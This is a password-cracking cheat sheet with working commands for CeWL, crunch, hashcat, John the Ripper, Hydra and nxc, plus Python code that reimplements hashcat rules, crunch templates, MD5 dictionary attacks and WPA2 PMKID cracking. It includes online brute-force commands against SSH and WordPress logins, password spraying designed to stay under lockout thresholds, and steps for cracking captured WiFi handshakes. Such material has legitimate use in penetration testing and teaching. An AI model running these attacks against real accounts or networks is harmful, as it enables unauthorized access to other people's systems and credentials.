CeWL
Spider sites to generate custom wordlists.

# Crawl depth 7, min word length 8, include numbers
cewl -d 7 -m 8 --with-numbers -w cewl.lst http://targeturl.com
 
# Include email addresses
cewl -e http://targeturl.com -w cewl_words.txt --email_file emails.txt
 
# Allow spidering offsite links
cewl --offsite -w full.lst http://targeturl.com

Crunch
Generate brute-force-style wordlists.

# Basic character set, 6–8 character words
crunch 6 8 abc123 -o custom.lst
 
# All lowercase 8-character words
crunch 8 8 abcdefghijklmnopqrstuvwxyz -o lowercase8.txt
 
# Template (-t): @ = lowercase letter, , = uppercase, % = digit, ^ = symbol; any other character is literal.
# min and max must both equal the template length (admin@@ is 7 characters, so 6 6 is rejected)
crunch 7 7 -t admin@@ -o adminlist.txt
 
# Pipe candidates straight into a cracker (no file written). hashcat reads the
# wordlist from stdin when -a 0 is given without a dictionary argument.
crunch 4 4 0123456789 | hashcat -a 0 -m 0 hashes.txt
 
# Structured patterns
crunch 5 5 -t @@123 -o patterns.txt
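The template symbols above are easy to misread, and crunch rejects a -t template whose length differs from min/max. The following is an added illustration (not crunch's own code) that expands a crunch-style template and a min/max charset range exactly as crunch would, and counts the output before anything is written to disk. The symbol set behind ^ is a constructed subset; crunch's default symbol list is longer.

```python
import itertools
import string

# crunch -t placeholder classes as documented in `man crunch`. The symbol set
# here is a constructed subset; crunch's own default symbol list is longer.
PLACEHOLDERS = {
    "@": string.ascii_lowercase,  # @ = lowercase letter
    ",": string.ascii_uppercase,  # , = uppercase letter
    "%": string.digits,           # % = digit
    "^": "!@#$%&*?",              # ^ = symbol (constructed subset)
}


def check_template(min_len, max_len, template):
    """crunch refuses a -t template whose length differs from min/max;
    `crunch 6 6 -t admin@@` fails for exactly this reason (admin@@ is 7 chars)."""
    if not (min_len == max_len == len(template)):
        raise ValueError(
            f"template {template!r} is {len(template)} chars; "
            f"min and max must both be {len(template)}"
        )


def expand_template(template):
    """Yield every candidate matching a crunch -t template: literal characters
    stay fixed, placeholder characters range over their class."""
    classes = [PLACEHOLDERS.get(ch, ch) for ch in template]
    for combo in itertools.product(*classes):
        yield "".join(combo)


def template_size(template):
    """Number of candidates a template expands to (check this before -o)."""
    n = 1
    for ch in template:
        n *= len(PLACEHOLDERS.get(ch, ch))
    return n


def brute_force(charset, min_len, max_len):
    """Equivalent of `crunch MIN MAX CHARSET`: every string of each length over
    the charset, shortest lengths first, in charset order."""
    for n in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=n):
            yield "".join(combo)


def charset_size(charset, min_len, max_len):
    """Line count `crunch MIN MAX CHARSET` would produce."""
    return sum(len(charset) ** n for n in range(min_len, max_len + 1))


if __name__ == "__main__":
    check_template(7, 7, "admin@@")
    print(f"admin@@ expands to {template_size('admin@@')} candidates")
    for word in itertools.islice(expand_template("admin@@"), 3):
        print(word)
    print(f"crunch 6 8 abc123 would write {charset_size('abc123', 6, 8)} lines")
```

Sizing first matters: `crunch 6 8 abc123` is about two million lines, while a full lowercase 8-character list (`crunch 8 8 abcdefghijklmnopqrstuvwxyz`) is 26^8, roughly 209 billion lines, which is a mask-attack job for hashcat (`-a 3 ?l?l?l?l?l?l?l?l`), not a file.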

Hashcat
Rule-based and GPU-accelerated cracking.

# Create a new wordlist using rules
hashcat -r /usr/share/hashcat/rules/best64.rule --stdout base.lst > passlist.txt
 
# Crack bcrypt
hashcat -m 3200 hashes.txt passlist.txt
 
# Crack MD5
hashcat -a 0 -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
 
# Crack NTLM
hashcat -a 0 -m 1000 ntlm.hashes password.lst -o cracked.txt
 
# Cracked hashes are appended to the potfile automatically:
#   ~/.local/share/hashcat/hashcat.potfile on hashcat 6.x (older builds used ~/.hashcat/hashcat.potfile)
# -o cracked.txt additionally writes the hash:plain pairs to a file of your choosing
 
# Show previously cracked results for a hash file (read back from the potfile; -m must match the original run)
hashcat --show -m [mode] hashes.txt
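What `-r best64.rule --stdout` actually does is worth seeing once in code. The following is an added illustration, not hashcat's code: a parser and evaluator for a subset of the hashcat rule language (`:`, `l`, `u`, `c`, `C`, `t`, `TN`, `r`, `d`, `f`, `[`, `]`, `$X`, `^X`, `DN`, `sXY`), a generator equivalent to `--stdout`, and a dictionary attack on raw MD5 (`-a 0 -m 0`) using those rules. The rule lines and base words are constructed samples.

```python
import hashlib

# Rule functions implemented here (a subset of hashcat's rule language).
# Value = number of argument characters that follow the function letter.
ARGC = {":": 0, "l": 0, "u": 0, "c": 0, "C": 0, "t": 0, "r": 0, "d": 0, "f": 0,
        "[": 0, "]": 0, "$": 1, "^": 1, "T": 1, "D": 1, "s": 2}


def _pos(ch):
    """Rule positions are 0-9, then A-Z for 10..35."""
    return int(ch, 36)


def parse_rule(rule):
    """Split a rule line into (function, args) pairs. Spaces are optional
    separators, so `$1 $2` and `$1$2` parse the same and `]]` is two ops."""
    ops, i = [], 0
    while i < len(rule):
        ch = rule[i]
        if ch == " ":
            i += 1
            continue
        if ch not in ARGC:
            raise ValueError(f"unsupported rule function {ch!r} in {rule!r}")
        n = ARGC[ch]
        ops.append((ch, rule[i + 1:i + 1 + n]))
        i += 1 + n
    return ops


def apply_rule(word, rule):
    """Apply one rule line to one word, left to right."""
    w = word
    for op, arg in parse_rule(rule):
        if op == "l":   w = w.lower()
        elif op == "u": w = w.upper()
        elif op == "c": w = w[:1].upper() + w[1:].lower()   # capitalize
        elif op == "C": w = w[:1].lower() + w[1:].upper()   # invert capitalize
        elif op == "t": w = w.swapcase()                    # toggle all
        elif op == "T":                                     # toggle at position N
            p = _pos(arg)
            w = w[:p] + w[p:p + 1].swapcase() + w[p + 1:]
        elif op == "r": w = w[::-1]                         # reverse
        elif op == "d": w = w + w                           # duplicate
        elif op == "f": w = w + w[::-1]                     # reflect
        elif op == "[": w = w[1:]                           # delete first char
        elif op == "]": w = w[:-1]                          # delete last char
        elif op == "$": w = w + arg                         # append char
        elif op == "^": w = arg + w                         # prepend char
        elif op == "D":                                     # delete char at position N
            p = _pos(arg)
            w = w[:p] + w[p + 1:]
        elif op == "s": w = w.replace(arg[0], arg[1])       # sXY: replace X with Y
        # ":" is the no-op rule: keep the word unchanged
    return w


def load_rules(text):
    """Rule files: one rule per line; blank lines and # comments are ignored."""
    lines = (ln.strip() for ln in text.splitlines())
    return [ln for ln in lines if ln and not ln.startswith("#")]


def generate(base_words, rules):
    """What `hashcat -r rules --stdout base.lst` emits: every word x every rule.
    Deduplicated here; hashcat itself does not dedupe, so pipe through sort -u."""
    seen, out = set(), []
    for w in base_words:
        for r in rules:
            cand = apply_rule(w, r)
            if cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


def md5hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def crack_md5(hashes, base_words, rules):
    """What `hashcat -a 0 -m 0 hashes.txt base.lst -r rules` does: hash each
    candidate and look it up against the targets. Returns {hash: plaintext}."""
    targets = {h.strip().lower() for h in hashes}
    cracked = {}
    for cand in generate(base_words, rules):
        h = md5hex(cand)
        if h in targets and h not in cracked:
            cracked[h] = cand
            if len(cracked) == len(targets):
                break
    return cracked


# Constructed sample: a few best64-style rules. Real rule files are much longer.
SAMPLE_RULES = load_rules("""
# comment lines are skipped
:
l
u
c
r
d
$1
$1 $2 $3
c $1
so0 sa@
]]
T0 $!
""")

if __name__ == "__main__":
    base = ["password", "Summer"]
    print(generate(base, SAMPLE_RULES))
    targets = [md5hex("Password1"), md5hex("p@ssw0rd"), md5hex("Summer123")]
    print(crack_md5(targets, base, SAMPLE_RULES))
```

The rule engine is the reason a short, targeted base list (CeWL output, employee names, the company name) usually beats a huge generic list: twelve rules turn one base word into twelve candidates, and best64 alone multiplies the list by 77.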

John the Ripper
Flexible CPU-based cracking.

# MD5 cracking
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 hashes.txt
 
# Monitor progress of the running or last session (or press any key in the running job for a status line)
john --status

zip2john
Extract a crackable hash from an encrypted archive.

# Writes the archive's password hash in John format (PKZIP and WinZip AES are auto-detected);
# john then takes ziphash.txt as an ordinary hash file
zip2john protected.zip > ziphash.txt

Hydra
Online brute-forcing.

# SSH brute force
hydra -l username -P passwords.txt 192.168.1.1 ssh
 
# HTTP GET brute
hydra -V -l admin -P passwords.txt -t 36 -f -s 80 192.168.1.1 http-get /
 
# WordPress POST form
hydra -L users.txt -P passwords.txt target http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:S=Location' -V

Password spraying with nxc
Try one password across many accounts (stays under lockout thresholds; the reverse of a per-user brute force).

# one password against every user in users.txt; keep going after a hit so every account that shares it is found
nxc ssh targets.txt -u users.txt -p [password] --continue-on-success

WiFi Cracking

Hashcat

# WPA2 4-way handshake, legacy hccapx container. Mode 2500 is deprecated since hashcat 6.0
# (needs --deprecated-check-disable); convert the capture to 22000 on current builds instead.
hashcat -m 2500 handshake.hccapx /usr/share/wordlists/rockyou.txt
 
# WPA2 PMKID, legacy 16800 format (also deprecated for the same reason)
hashcat -m 16800 pmkid.16800 /usr/share/wordlists/rockyou.txt
 
# Apply rules, here against the current unified 22000 format (PMKID and EAPOL handshakes in one file)
hashcat -m 22000 hash.22000 /usr/share/wordlists/rockyou.txt -r rules/best64.rule

John the Ripper

# WPA2 handshake conversion
wpapcap2john capture.cap > handshake.john
john --wordlist=/usr/share/wordlists/rockyou.txt handshake.john

Notes:

  • hcxpcapngtool -o hash.22000 capture.pcapng converts a capture into hashcat's 22000 format (PMKIDs and EAPOL handshakes together); 22000 replaces both 2500 and 16800
  • PMKID does not require a connected client: the AP sends it in the RSN IE of the first EAPOL message, so an association attempt from the attacker's own card is enough to capture it
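Why the PMKID is crackable at all, and why the attack needs no client, follows directly from how it is computed: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds) and PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || STA MAC), both of which an attacker can recompute per candidate. The following is an added illustration (not hashcat's or hcxtools' code) that builds a 16800-style line from a known passphrase, rewrites it in the 22000 layout, and cracks it with a dictionary. The passphrase, SSID and MAC addresses are constructed test values.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """WPA2-Personal PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This one slow step is where hashcat spends its time for every candidate."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk, ap_mac, sta_mac):
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || STA MAC) (IEEE 802.11).
    The AP puts this in the RSN IE of EAPOL message 1, before any client has
    answered, which is why no connected client is needed to capture it."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def make_16800_line(passphrase, ssid, ap_mac, sta_mac):
    """Build a hashcat -m 16800 line (PMKID*MAC_AP*MAC_STA*ESSID_hex) for a known
    passphrase: a constructed test vector, not a real capture."""
    tag = pmkid(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac)
    return "*".join([tag.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode().hex()])


def to_22000(line_16800):
    """Rewrite a 16800 line in the unified 22000 layout
    WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_hex*** (type 01 = PMKID; the trailing
    anonce, EAPOL and message-pair fields are only filled for type 02 handshakes)."""
    tag, ap, sta, essid = line_16800.strip().split("*")
    return f"WPA*01*{tag}*{ap}*{sta}*{essid}***"


def parse_pmkid_line(line):
    """Accept either format and return (pmkid, ap_mac, sta_mac, ssid)."""
    fields = line.strip().split("*")
    if fields[0] == "WPA" and fields[1] == "01":
        fields = fields[2:6]
    tag, ap, sta, essid = fields[:4]
    return (bytes.fromhex(tag), bytes.fromhex(ap), bytes.fromhex(sta),
            bytes.fromhex(essid).decode())


def crack_pmkid(line, candidates):
    """Dictionary attack on one PMKID line; returns the passphrase or None."""
    target, ap, sta, ssid = parse_pmkid_line(line)
    for cand in candidates:
        if not 8 <= len(cand) <= 63:  # WPA passphrases are 8..63 chars; skip the rest like hashcat does
            continue
        if hmac.compare_digest(pmkid(pmk_from_passphrase(cand, ssid), ap, sta), target):
            return cand
    return None


if __name__ == "__main__":
    AP, STA = bytes.fromhex("0011223344aa"), bytes.fromhex("66778899bbcc")  # constructed MACs
    line = make_16800_line("correct horse", "TestNet", AP, STA)
    print(line)
    print(to_22000(line))
    print(crack_pmkid(line, ["password", "short", "letmein123", "correct horse"]))
```

Note that the SSID is the PBKDF2 salt, so a PMK computed for one network name is useless against another; precomputed PMK tables only exist for common default SSIDs, which is an argument for renaming a network as well as for a long passphrase.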

Hash Identification Tools

# Command line tools (-m makes hashid print the matching hashcat mode numbers)
hashid -m hash.txt
hash-identifier  # interactive menu
# Caveat: a bare 32-hex-character hash is MD5, NTLM, or several others by shape alone;
# where it came from (web app database vs. SAM/NTDS dump) decides the mode

Popular Hashcat Modes

  0     = MD5
  500   = md5crypt ($1$)
  1000  = NTLM
  1800  = sha512crypt ($6$)
  3200  = bcrypt ($2a$/$2b$/$2y$)
  16800 = WPA-PMKID-PBKDF2 (legacy, deprecated)
  22000 = WPA-PBKDF2-PMKID+EAPOL (current; replaces 2500 and 16800)
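Picking the mode from the hash's shape is mechanical for the formats in the table above, except for the bare 32-hex case, which only context resolves. The following is an added illustration (not hashid's code): signature-based identification for the modes in the table, plus a helper that pulls the NT hash out of a secretsdump-style `user:rid:lmhash:nthash:::` line, where the source, not the shape, tells you it is mode 1000. All sample hashes are constructed (the MD5 is that of the word "password"; the NT hash is that of the empty string).

```python
import re

# Pattern -> (hashcat modes, label). Specific signatures come before the bare
# 32-hex case so a crypt-style or WPA line never falls through to it.
SIGNATURES = [
    (re.compile(r"^\$2[abxy]\$\d{2}\$[./A-Za-z0-9]{53}$"), [3200], "bcrypt"),
    (re.compile(r"^\$6\$(rounds=\d+\$)?[^$]{1,16}\$[./A-Za-z0-9]{86}$"), [1800], "sha512crypt"),
    (re.compile(r"^\$1\$[^$]{1,8}\$[./A-Za-z0-9]{22}$"), [500], "md5crypt"),
    (re.compile(r"^WPA\*01\*[0-9a-f]{32}\*[0-9a-f]{12}\*[0-9a-f]{12}\*[0-9a-f]*\*\*\*$", re.I),
     [22000], "WPA PMKID (22000)"),
    (re.compile(r"^WPA\*02\*[0-9a-f]{32}\*[0-9a-f]{12}\*[0-9a-f]{12}\*", re.I),
     [22000], "WPA EAPOL handshake (22000)"),
    (re.compile(r"^[0-9a-f]{32}\*[0-9a-f]{12}\*[0-9a-f]{12}\*[0-9a-f]+$", re.I),
     [16800], "WPA PMKID (legacy 16800; convert to 22000)"),
    (re.compile(r"^[0-9a-f]{32}$", re.I),
     [0, 1000], "32 hex chars: MD5 or NTLM (ambiguous by shape; decide from the source)"),
]


def identify(hash_str):
    """Return [(mode, label), ...] for every signature the string matches."""
    s = hash_str.strip()
    hits = []
    for pat, modes, label in SIGNATURES:
        if pat.match(s):
            hits.extend((m, label) for m in modes)
    return hits


def modes_for(hash_str):
    """Just the candidate mode numbers, in table order."""
    return [m for m, _ in identify(hash_str)]


def nt_hash_from_secretsdump(line):
    """secretsdump / nxc --sam style line `user:rid:lmhash:nthash:::` -> NT hash.
    By shape this is MD5-or-NTLM; the source says it is mode 1000."""
    parts = line.strip().split(":")
    if len(parts) < 4 or not re.fullmatch(r"[0-9a-f]{32}", parts[3], re.I):
        raise ValueError("not a secretsdump-style line")
    return parts[3].lower()


SAMPLES = {  # constructed examples, not real credentials
    "md5-or-ntlm": "5f4dcc3b5aa765d61d8327deb882cf99",          # MD5("password")
    "bcrypt": "$2b$12$" + "a" * 53,
    "sha512crypt": "$6$saltsalt$" + "b" * 86,
    "md5crypt": "$1$saltsalt$" + "c" * 22,
    "pmkid-22000": "WPA*01*" + "0" * 32 + "*0011223344aa*66778899bbcc*546573744e6574***",
    "pmkid-16800": "0" * 32 + "*0011223344aa*66778899bbcc*546573744e6574",
    "secretsdump": "Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
}

if __name__ == "__main__":
    for name, h in SAMPLES.items():
        if name == "secretsdump":
            h = nt_hash_from_secretsdump(h)
        print(f"{name:12} -> {identify(h) or 'unknown'}")
```

If a guess is wrong, hashcat usually refuses the file outright ("Token length exception" or "Separator unmatched"), which is the cheap check: try the candidate mode with --show before launching a long run.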

Wordlist Analysis & Enhancement

# Analyze patterns in a list of cracked passwords (length distribution, base words, common suffixes and years) to steer the next rule or mask run
pipal wordlist.txt
 
# Mangle names and keywords into a wordlist (rsmangler applies all of its mangles by default; --min/--max bound the output length)
rsmangler --file names.txt --min 6 --max 16 > mangled.lst

References

https://www.blackhillsinfosec.com/wp-content/uploads/2020/09/HashcatCheatSheet.v2018.1b.pdf